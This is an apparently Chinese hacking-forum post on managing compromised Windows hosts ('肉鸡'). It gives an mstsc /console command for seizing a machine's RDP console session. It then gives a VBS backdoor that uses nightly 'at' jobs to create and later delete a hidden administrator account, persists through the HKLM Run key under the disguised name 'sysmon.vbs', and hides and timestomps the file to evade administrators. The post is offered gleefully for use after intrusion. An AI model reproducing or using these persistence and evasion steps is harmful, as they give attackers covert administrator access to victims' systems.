“3389终端连接-超出终端连接数怎么办”的解决方法

mstsc /v:肉鸡IP地址:3389 /console
通过以上命令连接过去，不管有多少人登录，都能登录上去，实乃居家旅行，杀人放火必备武器呐…
解释下：加上console命令，跟不加的区别，直接通过3389终端连接器连接的话，也就是虚拟一个桌面，你所有的操作都是独立的，也就是独立的用户，独立的进程，独立的桌面；
而加上console的话，连接上去登录进去就是主机本地的界面，也就是说，你现在看到的东西跟管理员在当地管理远程服务器是一样一样的，而一旦管理员登录上线，你的账户就会立马被锁定，而他能看到你的所有操作！！！（你们操作的是同一个桌面，就像“抢鼠标”一样，刺激吧）
一点小tips，入侵后该如何管理肉鸡呢？直接添加一个账户肯定不行，上传一个后门吧，现在的杀毒软件已经很成熟了…看看下面这个方法，也许能用上呢…
在windows目录下新建一个后缀为VBS的文件，写入以下内容：
dim wsh
set wsh=createobject(“wscript.shell”)
wsh.run “at 01:02 net user matrix 123456 /add”,0 建立计划任务，每天凌晨1：00添加一个系统账户
wsh.run “at 01:03 net localgroup administrators matrix /add”,0 加入管理员组
wsh.run “at 02:00 net user matrix /del”,0 在凌晨2点把新建的账户自动删除掉，免得被管理员发现（这样一来，你只需要每天凌晨准时管理肉鸡就好了，管理员也不会发现任何痕迹，爽吧，和谐和谐…）
然后保存，在运行里输入regedit打开注册表编辑器，找到以下键值，
hkey_local_machine\software\microsoft\windows\CurrentVersion\run 新增加一个sysmon键值，输入内容为：c:\windows\sysmon.vbs
这名字够逼真吧，一般人能猜到这是后门么？哈哈
然后把sysmon.vbs设置属性为隐藏，再把文件时间修改成系统目录一致。
注意：这时检查下系统的task schedule服务是否开启，因为运行at命令需要使用到该服务。